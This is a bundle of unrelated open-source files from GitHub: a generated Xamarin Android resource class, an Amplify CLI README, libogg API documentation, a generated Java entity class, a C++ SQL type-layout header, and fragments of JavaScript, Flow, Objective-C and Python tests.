re[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length
}
// leave it in a clean state
re[t.COERCERTL].lastIndex = -1
}
if (match === null) {
return null
}
return parse(match[2] +
'.' + (match[3] || '0') +
'.' + (match[4] || '0'), options)
}
| {
"pile_set_name": "Github"
} |
#pragma warning disable 1591
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
[assembly: global::Android.Runtime.ResourceDesignerAttribute("GalaSoft.MvvmLight.Test.Resource", IsApplication=true)]
namespace GalaSoft.MvvmLight.Test
{
[System.CodeDom.Compiler.GeneratedCodeAttribute("Xamarin.Android.Build.Tasks", "1.0.0.0")]
public partial class Resource
{
static Resource()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
public static void UpdateIdValues()
{
global::Xamarin.Android.NUnitLite.Resource.Id.OptionHostName = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionHostName;
global::Xamarin.Android.NUnitLite.Resource.Id.OptionPort = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionPort;
global::Xamarin.Android.NUnitLite.Resource.Id.OptionRemoteServer = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionRemoteServer;
global::Xamarin.Android.NUnitLite.Resource.Id.OptionsButton = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionsButton;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultFullName = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultFullName;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultMessage = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultMessage;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultResultState = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultResultState;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultRunSingleMethodTest = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultRunSingleMethodTest;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultStackTrace = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultStackTrace;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsFailed = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsFailed;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsId = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsId;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsIgnored = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsIgnored;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsInconclusive = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsInconclusive;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsMessage = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsMessage;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsPassed = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsPassed;
global::Xamarin.Android.NUnitLite.Resource.Id.ResultsResult = global::GalaSoft.MvvmLight.Test.Resource.Id.ResultsResult;
global::Xamarin.Android.NUnitLite.Resource.Id.RunTestsButton = global::GalaSoft.MvvmLight.Test.Resource.Id.RunTestsButton;
global::Xamarin.Android.NUnitLite.Resource.Id.TestSuiteListView = global::GalaSoft.MvvmLight.Test.Resource.Id.TestSuiteListView;
global::Xamarin.Android.NUnitLite.Resource.Layout.options = global::GalaSoft.MvvmLight.Test.Resource.Layout.options;
global::Xamarin.Android.NUnitLite.Resource.Layout.results = global::GalaSoft.MvvmLight.Test.Resource.Layout.results;
global::Xamarin.Android.NUnitLite.Resource.Layout.test_result = global::GalaSoft.MvvmLight.Test.Resource.Layout.test_result;
global::Xamarin.Android.NUnitLite.Resource.Layout.test_suite = global::GalaSoft.MvvmLight.Test.Resource.Layout.test_suite;
}
public partial class Attribute
{
// aapt resource value: 0x7f010000
public const int layoutManager = 2130771968;
// aapt resource value: 0x7f010002
public const int reverseLayout = 2130771970;
// aapt resource value: 0x7f010001
public const int spanCount = 2130771969;
// aapt resource value: 0x7f010003
public const int stackFromEnd = 2130771971;
static Attribute()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private Attribute()
{
}
}
public partial class Dimension
{
// aapt resource value: 0x7f040000
public const int item_touch_helper_max_drag_scroll_per_frame = 2130968576;
// aapt resource value: 0x7f040001
public const int item_touch_helper_swipe_escape_max_velocity = 2130968577;
// aapt resource value: 0x7f040002
public const int item_touch_helper_swipe_escape_velocity = 2130968578;
static Dimension()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private Dimension()
{
}
}
public partial class Drawable
{
// aapt resource value: 0x7f020000
public const int Icon = 2130837504;
static Drawable()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private Drawable()
{
}
}
public partial class Id
{
// aapt resource value: 0x7f050002
public const int OptionHostName = 2131034114;
// aapt resource value: 0x7f050003
public const int OptionPort = 2131034115;
// aapt resource value: 0x7f050001
public const int OptionRemoteServer = 2131034113;
// aapt resource value: 0x7f050011
public const int OptionsButton = 2131034129;
// aapt resource value: 0x7f05000c
public const int ResultFullName = 2131034124;
// aapt resource value: 0x7f05000e
public const int ResultMessage = 2131034126;
// aapt resource value: 0x7f05000d
public const int ResultResultState = 2131034125;
// aapt resource value: 0x7f05000b
public const int ResultRunSingleMethodTest = 2131034123;
// aapt resource value: 0x7f05000f
public const int ResultStackTrace = 2131034127;
// aapt resource value: 0x7f050007
public const int ResultsFailed = 2131034119;
// aapt resource value: 0x7f050004
public const int ResultsId = 2131034116;
// aapt resource value: 0x7f050008
public const int ResultsIgnored = 2131034120;
// aapt resource value: 0x7f050009
public const int ResultsInconclusive = 2131034121;
// aapt resource value: 0x7f05000a
public const int ResultsMessage = 2131034122;
// aapt resource value: 0x7f050006
public const int ResultsPassed = 2131034118;
// aapt resource value: 0x7f050005
public const int ResultsResult = 2131034117;
// aapt resource value: 0x7f050010
public const int RunTestsButton = 2131034128;
// aapt resource value: 0x7f050012
public const int TestSuiteListView = 2131034130;
// aapt resource value: 0x7f050000
public const int item_touch_helper_previous_elevation = 2131034112;
static Id()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private Id()
{
}
}
public partial class Layout
{
// aapt resource value: 0x7f030000
public const int options = 2130903040;
// aapt resource value: 0x7f030001
public const int results = 2130903041;
// aapt resource value: 0x7f030002
public const int test_result = 2130903042;
// aapt resource value: 0x7f030003
public const int test_suite = 2130903043;
static Layout()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private Layout()
{
}
}
public partial class String
{
// aapt resource value: 0x7f060001
public const int ApplicationName = 2131099649;
// aapt resource value: 0x7f060000
public const int Hello = 2131099648;
static String()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private String()
{
}
}
public partial class Styleable
{
public static int[] RecyclerView = new int[] {
16842948,
2130771968,
2130771969,
2130771970,
2130771971};
// aapt resource value: 0
public const int RecyclerView_android_orientation = 0;
// aapt resource value: 1
public const int RecyclerView_layoutManager = 1;
// aapt resource value: 3
public const int RecyclerView_reverseLayout = 3;
// aapt resource value: 2
public const int RecyclerView_spanCount = 2;
// aapt resource value: 4
public const int RecyclerView_stackFromEnd = 4;
static Styleable()
{
global::Android.Runtime.ResourceIdManager.UpdateIdValues();
}
private Styleable()
{
}
}
}
}
#pragma warning restore 1591
| {
"pile_set_name": "Github"
} |
# Amplify CLI Notifications Plugin
## Commands Summary
The Amplify Notifications Category Plugin supports the commands listed in the following table.
| Command | Description |
| --- | --- |
| amplify notifications add | Adds a notification channel. |
| amplify notifications remove | Removes a notification channel. |
| amplify notifications update | Configures a notification channel. |
| amplify notifications status | Lists the enabled/disabled statuses of the available notification channels. |
| amplify notifications console | Opens the Amazon Pinpoint console displaying the current channel settings. |
| {
"pile_set_name": "Github"
} |
import material/material2tropic;
main () {
content =
enumFromTo(1, 100)
|> (\xs -> map(xs, \x -> {
ps = make(PositionScale(Point(0.0, 0.0), Point(0.0, 0.0)));
openPopup = \manager, parent, m2t -> \ -> {
popup =
MPopup(
[[MCols([MTextInput(make(""), [MWidth(320.0)], []), MIconButton("add", nop, [], [])])]],
ps,
[RMClickOutToClose()]
);
RenderMPopup(manager, parent, popup, m2t);
}
MCols([
MText(i2s(x), []),
MGetManager(\manager -> MGetFocusGroup(\parent -> MGetMaterial2Tropic(\m2t ->
MPositionScale(ps, MIconButton("menu", openPopup(manager, parent, m2t), [], []))
)))
])
}))
|> MLines
|> (\m -> MScroll(m, TFillXY(), []));
mrender(makeMaterialManager([]), true, content);
} | {
"pile_set_name": "Github"
} |
// Copyright 2013 Viewfinder. All rights reserved.
// Author: Peter Mattis.
#import <QuartzCore/QuartzCore.h>
CGMutablePathRef MakeChevronPath(float size);
// local variables:
// mode: objc
// end:
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>libogg - function - ogg_sync_pageout</title>
<link rel=stylesheet href="style.css" type="text/css">
</head>
<body bgcolor=white text=black link="#5555ff" alink="#5555ff" vlink="#5555ff">
<table border=0 width=100%>
<tr>
<td><p class=tiny>libogg documentation</p></td>
<td align=right><p class=tiny>libogg release 1.3.2 - 20140527</p></td>
</tr>
</table>
<h1>ogg_sync_pageout</h1>
<p><i>declared in "ogg/ogg.h";</i></p>
<p>This function takes the data stored in the buffer of the <a href="ogg_sync_state.html">ogg_sync_state</a> struct and inserts them into an <a href="ogg_page.html">ogg_page</a>.
<p>In an actual decoding loop, this function should be called first to ensure that the buffer is cleared. The example code below illustrates a clean reading loop which will fill and output pages.
<p><b>Caution:</b>This function should be called before reading into the buffer to ensure that data does not remain in the ogg_sync_state struct. Failing to do so may result in a memory leak. See the example code below for details.
<br><br>
<table border=0 color=black cellspacing=0 cellpadding=7>
<tr bgcolor=#cccccc>
<td>
<pre><b>
int ogg_sync_pageout(<a href="ogg_sync_state.html">ogg_sync_state</a> *oy, <a href="ogg_page.html">ogg_page</a> *og);
</b></pre>
</td>
</tr>
</table>
<h3>Parameters</h3>
<dl>
<dt><i>oy</i></dt>
<dd>Pointer to a previously declared <a href="ogg_sync_state.html">ogg_sync_state</a> struct. Normally, the internal storage of this struct should be filled with newly read data and verified using <a href="ogg_sync_wrote.html">ogg_sync_wrote</a>.</dd>
<dt><i>og</i></dt>
<dd>Pointer to page struct filled by this function.
</dl>
<h3>Return Values</h3>
<blockquote>
<li>-1 returned if stream has not yet captured sync (bytes were skipped).</li>
<li>0 returned if more data needed or an internal error occurred.</li>
<li>1 indicated a page was synced and returned.</li>
</blockquote>
<p>
<h3>Example Usage</h3>
<pre>
if (ogg_sync_pageout(&oy, &og) != 1) {
buffer = ogg_sync_buffer(&oy, 8192);
bytes = fread(buffer, 1, 8192, stdin);
ogg_sync_wrote(&oy, bytes);
}
</pre>
<br><br>
<hr noshade>
<table border=0 width=100%>
<tr valign=top>
<td><p class=tiny>copyright © 2000-2014 Xiph.Org</p></td>
<td align=right><p class=tiny><a href="http://www.xiph.org/ogg/">Ogg Container Format</a></p></td>
</tr><tr>
<td><p class=tiny>libogg documentation</p></td>
<td align=right><p class=tiny>libogg release 1.3.2 - 20140527</p></td>
</tr>
</table>
</body>
</html>
| {
"pile_set_name": "Github"
} |
package com.doublechaintech.retailscm.potentialcustomercontactperson;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Optional;
import java.util.stream.Collectors;
import java.math.BigDecimal;
import com.terapico.caf.DateTime;
import com.terapico.caf.Images;
import com.doublechaintech.retailscm.BaseEntity;
import com.doublechaintech.retailscm.SmartList;
import com.doublechaintech.retailscm.KeyValuePair;
import com.fasterxml.jackson.databind.annotation.JsonSerialize;
import com.doublechaintech.retailscm.potentialcustomercontact.PotentialCustomerContact;
import com.doublechaintech.retailscm.potentialcustomer.PotentialCustomer;
@JsonSerialize(using = PotentialCustomerContactPersonSerializer.class)
public class PotentialCustomerContactPerson extends BaseEntity implements java.io.Serializable{
public static final String ID_PROPERTY = "id" ;
public static final String NAME_PROPERTY = "name" ;
public static final String MOBILE_PROPERTY = "mobile" ;
public static final String POTENTIAL_CUSTOMER_PROPERTY = "potentialCustomer" ;
public static final String DESCRIPTION_PROPERTY = "description" ;
public static final String VERSION_PROPERTY = "version" ;
public static final String POTENTIAL_CUSTOMER_CONTACT_LIST = "potentialCustomerContactList";
public static final String INTERNAL_TYPE="PotentialCustomerContactPerson";
public String getInternalType(){
return INTERNAL_TYPE;
}
public String getDisplayName(){
String displayName = getName();
if(displayName!=null){
return displayName;
}
return super.getDisplayName();
}
private static final long serialVersionUID = 1L;
protected String mId ;
protected String mName ;
protected String mMobile ;
protected PotentialCustomer mPotentialCustomer ;
protected String mDescription ;
protected int mVersion ;
protected SmartList<PotentialCustomerContact> mPotentialCustomerContactList;
public PotentialCustomerContactPerson(){
// lazy load for all the properties
}
public static PotentialCustomerContactPerson withId(String id){
PotentialCustomerContactPerson potentialCustomerContactPerson = new PotentialCustomerContactPerson();
potentialCustomerContactPerson.setId(id);
potentialCustomerContactPerson.setVersion(Integer.MAX_VALUE);
return potentialCustomerContactPerson;
}
public static PotentialCustomerContactPerson refById(String id){
return withId(id);
}
// disconnect from all, 中文就是一了百了,跟所有一切尘世断绝往来藏身于茫茫数据海洋
public void clearFromAll(){
setPotentialCustomer( null );
this.changed = true;
}
//Support for changing the property
public void changeProperty(String property, String newValueExpr) {
if(NAME_PROPERTY.equals(property)){
changeNameProperty(newValueExpr);
}
if(MOBILE_PROPERTY.equals(property)){
changeMobileProperty(newValueExpr);
}
if(DESCRIPTION_PROPERTY.equals(property)){
changeDescriptionProperty(newValueExpr);
}
}
protected void changeNameProperty(String newValueExpr){
String oldValue = getName();
String newValue = parseString(newValueExpr);
if(equalsString(oldValue , newValue)){
return;//they can be both null, or exact the same object, this is much faster than equals function
}
//they are surely different each other
updateName(newValue);
this.onChangeProperty(NAME_PROPERTY, oldValue, newValue);
return;
}
protected void changeMobileProperty(String newValueExpr){
String oldValue = getMobile();
String newValue = parseString(newValueExpr);
if(equalsString(oldValue , newValue)){
return;//they can be both null, or exact the same object, this is much faster than equals function
}
//they are surely different each other
updateMobile(newValue);
this.onChangeProperty(MOBILE_PROPERTY, oldValue, newValue);
return;
}
protected void changeDescriptionProperty(String newValueExpr){
String oldValue = getDescription();
String newValue = parseString(newValueExpr);
if(equalsString(oldValue , newValue)){
return;//they can be both null, or exact the same object, this is much faster than equals function
}
//they are surely different each other
updateDescription(newValue);
this.onChangeProperty(DESCRIPTION_PROPERTY, oldValue, newValue);
return;
}
public Object propertyOf(String property) {
if(NAME_PROPERTY.equals(property)){
return getName();
}
if(MOBILE_PROPERTY.equals(property)){
return getMobile();
}
if(POTENTIAL_CUSTOMER_PROPERTY.equals(property)){
return getPotentialCustomer();
}
if(DESCRIPTION_PROPERTY.equals(property)){
return getDescription();
}
if(POTENTIAL_CUSTOMER_CONTACT_LIST.equals(property)){
List<BaseEntity> list = getPotentialCustomerContactList().stream().map(item->item).collect(Collectors.toList());
return list;
}
//other property not include here
return super.propertyOf(property);
}
public void setId(String id){
this.mId = trimString(id);;
}
public String getId(){
return this.mId;
}
public PotentialCustomerContactPerson updateId(String id){
this.mId = trimString(id);;
this.changed = true;
return this;
}
public void mergeId(String id){
if(id != null) { setId(id);}
}
public void setName(String name){
this.mName = trimString(name);;
}
public String getName(){
return this.mName;
}
public PotentialCustomerContactPerson updateName(String name){
this.mName = trimString(name);;
this.changed = true;
return this;
}
public void mergeName(String name){
if(name != null) { setName(name);}
}
public void setMobile(String mobile){
this.mMobile = trimString(mobile);;
}
public String getMobile(){
return this.mMobile;
}
public PotentialCustomerContactPerson updateMobile(String mobile){
this.mMobile = trimString(mobile);;
this.changed = true;
return this;
}
public void mergeMobile(String mobile){
if(mobile != null) { setMobile(mobile);}
}
public String getMaskedMobile(){
String mobilePhoneNumber = getMobile();
return maskChinaMobileNumber(mobilePhoneNumber);
}
public void setPotentialCustomer(PotentialCustomer potentialCustomer){
this.mPotentialCustomer = potentialCustomer;;
}
public PotentialCustomer getPotentialCustomer(){
return this.mPotentialCustomer;
}
public PotentialCustomerContactPerson updatePotentialCustomer(PotentialCustomer potentialCustomer){
this.mPotentialCustomer = potentialCustomer;;
this.changed = true;
return this;
}
public void mergePotentialCustomer(PotentialCustomer potentialCustomer){
if(potentialCustomer != null) { setPotentialCustomer(potentialCustomer);}
}
public void clearPotentialCustomer(){
setPotentialCustomer ( null );
this.changed = true;
}
public void setDescription(String description){
this.mDescription = trimString(description);;
}
public String getDescription(){
return this.mDescription;
}
public PotentialCustomerContactPerson updateDescription(String description){
this.mDescription = trimString(description);;
this.changed = true;
return this;
}
public void mergeDescription(String description){
if(description != null) { setDescription(description);}
}
public void setVersion(int version){
this.mVersion = version;;
}
public int getVersion(){
return this.mVersion;
}
public PotentialCustomerContactPerson updateVersion(int version){
this.mVersion = version;;
this.changed = true;
return this;
}
public void mergeVersion(int version){
setVersion(version);
}
public SmartList<PotentialCustomerContact> getPotentialCustomerContactList(){
if(this.mPotentialCustomerContactList == null){
this.mPotentialCustomerContactList = new SmartList<PotentialCustomerContact>();
this.mPotentialCustomerContactList.setListInternalName (POTENTIAL_CUSTOMER_CONTACT_LIST );
//有名字,便于做权限控制
}
return this.mPotentialCustomerContactList;
}
public void setPotentialCustomerContactList(SmartList<PotentialCustomerContact> potentialCustomerContactList){
for( PotentialCustomerContact potentialCustomerContact:potentialCustomerContactList){
potentialCustomerContact.setContactTo(this);
}
this.mPotentialCustomerContactList = potentialCustomerContactList;
this.mPotentialCustomerContactList.setListInternalName (POTENTIAL_CUSTOMER_CONTACT_LIST );
}
public void addPotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
potentialCustomerContact.setContactTo(this);
getPotentialCustomerContactList().add(potentialCustomerContact);
}
public void addPotentialCustomerContactList(SmartList<PotentialCustomerContact> potentialCustomerContactList){
for( PotentialCustomerContact potentialCustomerContact:potentialCustomerContactList){
potentialCustomerContact.setContactTo(this);
}
getPotentialCustomerContactList().addAll(potentialCustomerContactList);
}
public void mergePotentialCustomerContactList(SmartList<PotentialCustomerContact> potentialCustomerContactList){
if(potentialCustomerContactList==null){
return;
}
if(potentialCustomerContactList.isEmpty()){
return;
}
addPotentialCustomerContactList( potentialCustomerContactList );
}
public PotentialCustomerContact removePotentialCustomerContact(PotentialCustomerContact potentialCustomerContactIndex){
int index = getPotentialCustomerContactList().indexOf(potentialCustomerContactIndex);
if(index < 0){
String message = "PotentialCustomerContact("+potentialCustomerContactIndex.getId()+") with version='"+potentialCustomerContactIndex.getVersion()+"' NOT found!";
throw new IllegalStateException(message);
}
PotentialCustomerContact potentialCustomerContact = getPotentialCustomerContactList().get(index);
// potentialCustomerContact.clearContactTo(); //disconnect with ContactTo
potentialCustomerContact.clearFromAll(); //disconnect with ContactTo
boolean result = getPotentialCustomerContactList().planToRemove(potentialCustomerContact);
if(!result){
String message = "PotentialCustomerContact("+potentialCustomerContactIndex.getId()+") with version='"+potentialCustomerContactIndex.getVersion()+"' NOT found!";
throw new IllegalStateException(message);
}
return potentialCustomerContact;
}
//断舍离
public void breakWithPotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
if(potentialCustomerContact == null){
return;
}
potentialCustomerContact.setContactTo(null);
//getPotentialCustomerContactList().remove();
}
public boolean hasPotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
return getPotentialCustomerContactList().contains(potentialCustomerContact);
}
public void copyPotentialCustomerContactFrom(PotentialCustomerContact potentialCustomerContact) {
PotentialCustomerContact potentialCustomerContactInList = findThePotentialCustomerContact(potentialCustomerContact);
PotentialCustomerContact newPotentialCustomerContact = new PotentialCustomerContact();
potentialCustomerContactInList.copyTo(newPotentialCustomerContact);
newPotentialCustomerContact.setVersion(0);//will trigger copy
getPotentialCustomerContactList().add(newPotentialCustomerContact);
addItemToFlexiableObject(COPIED_CHILD, newPotentialCustomerContact);
}
public PotentialCustomerContact findThePotentialCustomerContact(PotentialCustomerContact potentialCustomerContact){
int index = getPotentialCustomerContactList().indexOf(potentialCustomerContact);
//The input parameter must have the same id and version number.
if(index < 0){
String message = "PotentialCustomerContact("+potentialCustomerContact.getId()+") with version='"+potentialCustomerContact.getVersion()+"' NOT found!";
throw new IllegalStateException(message);
}
return getPotentialCustomerContactList().get(index);
//Performance issue when using LinkedList, but it is almost an ArrayList for sure!
}
public void cleanUpPotentialCustomerContactList(){
getPotentialCustomerContactList().clear();
}
public void collectRefercences(BaseEntity owner, List<BaseEntity> entityList, String internalType){
addToEntityList(this, entityList, getPotentialCustomer(), internalType);
}
public List<BaseEntity> collectRefercencesFromLists(String internalType){
List<BaseEntity> entityList = new ArrayList<BaseEntity>();
collectFromList(this, entityList, getPotentialCustomerContactList(), internalType);
return entityList;
}
public List<SmartList<?>> getAllRelatedLists() {
List<SmartList<?>> listOfList = new ArrayList<SmartList<?>>();
listOfList.add( getPotentialCustomerContactList());
return listOfList;
}
public List<KeyValuePair> keyValuePairOf(){
List<KeyValuePair> result = super.keyValuePairOf();
appendKeyValuePair(result, ID_PROPERTY, getId());
appendKeyValuePair(result, NAME_PROPERTY, getName());
appendKeyValuePair(result, MOBILE_PROPERTY, getMaskedMobile());
appendKeyValuePair(result, POTENTIAL_CUSTOMER_PROPERTY, getPotentialCustomer());
appendKeyValuePair(result, DESCRIPTION_PROPERTY, getDescription());
appendKeyValuePair(result, VERSION_PROPERTY, getVersion());
appendKeyValuePair(result, POTENTIAL_CUSTOMER_CONTACT_LIST, getPotentialCustomerContactList());
if(!getPotentialCustomerContactList().isEmpty()){
appendKeyValuePair(result, "potentialCustomerContactCount", getPotentialCustomerContactList().getTotalCount());
appendKeyValuePair(result, "potentialCustomerContactCurrentPageNumber", getPotentialCustomerContactList().getCurrentPageNumber());
}
if (this.valueByKey("valuesOfGroupBy") != null) {
appendKeyValuePair(result, "valuesOfGroupBy", this.valueByKey("valuesOfGroupBy"));
}
return result;
}
public BaseEntity copyTo(BaseEntity baseDest){
if(baseDest instanceof PotentialCustomerContactPerson){
PotentialCustomerContactPerson dest =(PotentialCustomerContactPerson)baseDest;
dest.setId(getId());
dest.setName(getName());
dest.setMobile(getMobile());
dest.setPotentialCustomer(getPotentialCustomer());
dest.setDescription(getDescription());
dest.setVersion(getVersion());
dest.setPotentialCustomerContactList(getPotentialCustomerContactList());
}
super.copyTo(baseDest);
return baseDest;
}
public BaseEntity mergeDataTo(BaseEntity baseDest){
if(baseDest instanceof PotentialCustomerContactPerson){
PotentialCustomerContactPerson dest =(PotentialCustomerContactPerson)baseDest;
dest.mergeId(getId());
dest.mergeName(getName());
dest.mergeMobile(getMobile());
dest.mergePotentialCustomer(getPotentialCustomer());
dest.mergeDescription(getDescription());
dest.mergeVersion(getVersion());
dest.mergePotentialCustomerContactList(getPotentialCustomerContactList());
}
super.copyTo(baseDest);
return baseDest;
}
public BaseEntity mergePrimitiveDataTo(BaseEntity baseDest){
if(baseDest instanceof PotentialCustomerContactPerson){
PotentialCustomerContactPerson dest =(PotentialCustomerContactPerson)baseDest;
dest.mergeId(getId());
dest.mergeName(getName());
dest.mergeMobile(getMobile());
dest.mergeDescription(getDescription());
dest.mergeVersion(getVersion());
}
return baseDest;
}
public Object[] toFlatArray(){
return new Object[]{getId(), getName(), getMobile(), getPotentialCustomer(), getDescription(), getVersion()};
}
public String toString(){
StringBuilder stringBuilder=new StringBuilder(128);
stringBuilder.append("PotentialCustomerContactPerson{");
stringBuilder.append("\tid='"+getId()+"';");
stringBuilder.append("\tname='"+getName()+"';");
stringBuilder.append("\tmobile='"+getMobile()+"';");
if(getPotentialCustomer() != null ){
stringBuilder.append("\tpotentialCustomer='PotentialCustomer("+getPotentialCustomer().getId()+")';");
}
stringBuilder.append("\tdescription='"+getDescription()+"';");
stringBuilder.append("\tversion='"+getVersion()+"';");
stringBuilder.append("}");
return stringBuilder.toString();
}
//provide number calculation function
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2017 MapD Technologies, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @file SqlTypesLayout.h
* @author Alex Suhan <[email protected]>
*/
#ifndef QUERYENGINE_SQLTYPESLAYOUT_H
#define QUERYENGINE_SQLTYPESLAYOUT_H
#include "../Shared/TargetInfo.h"
#include "Logger/Logger.h"
#include <limits>
class OverflowOrUnderflow : public std::runtime_error {
public:
OverflowOrUnderflow() : std::runtime_error("Overflow or underflow") {}
};
inline const SQLTypeInfo get_compact_type(const TargetInfo& target) {
if (!target.is_agg) {
return (target.sql_type.is_column() ? target.sql_type.get_elem_type()
: target.sql_type);
}
const auto agg_type = target.agg_kind;
const auto& agg_arg = target.agg_arg_type;
if (agg_arg.get_type() == kNULLT) {
CHECK_EQ(kCOUNT, agg_type);
CHECK(!target.is_distinct);
return target.sql_type;
}
if (is_agg_domain_range_equivalent(agg_type)) {
return agg_arg;
} else {
// Nullability of the target needs to match that of the agg for proper initialization
// of target (aggregate) values
auto modified_target_type = target.sql_type;
modified_target_type.set_notnull(agg_arg.get_notnull());
return modified_target_type;
}
}
inline void set_compact_type(TargetInfo& target, const SQLTypeInfo& new_type) {
if (target.is_agg) {
const auto agg_type = target.agg_kind;
auto& agg_arg = target.agg_arg_type;
if (agg_type != kCOUNT || agg_arg.get_type() != kNULLT) {
agg_arg = new_type;
return;
}
}
target.sql_type = new_type;
}
inline int64_t inline_int_null_val(const SQLTypeInfo& ti) {
auto type = ti.get_type();
if (ti.is_string()) {
CHECK_EQ(kENCODING_DICT, ti.get_compression());
CHECK_EQ(4, ti.get_logical_size());
type = kINT;
}
switch (type) {
case kBOOLEAN:
return inline_int_null_value<int8_t>();
case kTINYINT:
return inline_int_null_value<int8_t>();
case kSMALLINT:
return inline_int_null_value<int16_t>();
case kINT:
return inline_int_null_value<int32_t>();
case kBIGINT:
return inline_int_null_value<int64_t>();
case kTIMESTAMP:
case kTIME:
case kDATE:
case kINTERVAL_DAY_TIME:
case kINTERVAL_YEAR_MONTH:
return inline_int_null_value<int64_t>();
case kDECIMAL:
case kNUMERIC:
return inline_int_null_value<int64_t>();
default:
abort();
}
}
inline int64_t inline_fixed_encoding_null_val(const SQLTypeInfo& ti) {
if (ti.get_compression() == kENCODING_NONE) {
return inline_int_null_val(ti);
}
if (ti.get_compression() == kENCODING_DATE_IN_DAYS) {
switch (ti.get_comp_param()) {
case 0:
case 32:
return inline_int_null_value<int32_t>();
case 16:
return inline_int_null_value<int16_t>();
default:
#ifndef __CUDACC__
CHECK(false) << "Unknown encoding width for date in days: "
<< ti.get_comp_param();
#else
CHECK(false);
#endif
}
}
if (ti.get_compression() == kENCODING_DICT) {
CHECK(ti.is_string());
switch (ti.get_size()) {
case 1:
return inline_int_null_value<uint8_t>();
case 2:
return inline_int_null_value<uint16_t>();
case 4:
return inline_int_null_value<int32_t>();
default:
#ifndef __CUDACC__
CHECK(false) << "Unknown size for dictionary encoded type: " << ti.get_size();
#else
CHECK(false);
#endif
}
}
CHECK_EQ(kENCODING_FIXED, ti.get_compression());
CHECK(ti.is_integer() || ti.is_time() || ti.is_decimal());
CHECK_EQ(0, ti.get_comp_param() % 8);
return -(1L << (ti.get_comp_param() - 1));
}
inline double inline_fp_null_val(const SQLTypeInfo& ti) {
CHECK(ti.is_fp());
const auto type = ti.get_type();
switch (type) {
case kFLOAT:
return inline_fp_null_value<float>();
case kDOUBLE:
return inline_fp_null_value<double>();
default:
abort();
}
}
inline uint64_t exp_to_scale(const unsigned exp) {
uint64_t res = 1;
for (unsigned i = 0; i < exp; ++i) {
res *= 10;
}
return res;
}
inline size_t get_bit_width(const SQLTypeInfo& ti) {
const auto int_type = ti.is_decimal() ? kBIGINT : ti.get_type();
switch (int_type) {
case kNULLT:
LOG(FATAL) << "Untyped NULL values are not supported. Please CAST any NULL "
"constants to a type.";
case kBOOLEAN:
return 8;
case kTINYINT:
return 8;
case kSMALLINT:
return 16;
case kINT:
return 32;
case kBIGINT:
return 64;
case kFLOAT:
return 32;
case kDOUBLE:
return 64;
case kTIME:
case kTIMESTAMP:
case kDATE:
case kINTERVAL_DAY_TIME:
case kINTERVAL_YEAR_MONTH:
return sizeof(time_t) * 8;
case kTEXT:
case kVARCHAR:
case kCHAR:
return 32;
case kARRAY:
if (ti.get_size() == -1) {
throw std::runtime_error("Projecting on unsized array column not supported.");
}
return ti.get_size() * 8;
case kPOINT:
case kLINESTRING:
case kPOLYGON:
case kMULTIPOLYGON:
return 32;
case kCOLUMN:
return ti.get_elem_type().get_size() * 8;
default:
LOG(FATAL) << "Unhandled int_type: " << int_type;
return {};
}
}
inline bool is_unsigned_type(const SQLTypeInfo& ti) {
return ti.get_compression() == kENCODING_DICT && ti.get_size() < ti.get_logical_size();
}
#endif // QUERYENGINE_SQLTYPESLAYOUT_H
| {
"pile_set_name": "Github"
} |
# encoding: utf-8
"""
Test suite for docx.dml.color module.
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from docx.enum.dml import MSO_COLOR_TYPE, MSO_THEME_COLOR
from docx.dml.color import ColorFormat
from docx.shared import RGBColor
from ..unitutil.cxml import element, xml
import pytest
class DescribeColorFormat(object):
def it_knows_its_color_type(self, type_fixture):
color_format, expected_value = type_fixture
assert color_format.type == expected_value
def it_knows_its_RGB_value(self, rgb_get_fixture):
color_format, expected_value = rgb_get_fixture
assert color_format.rgb == expected_value
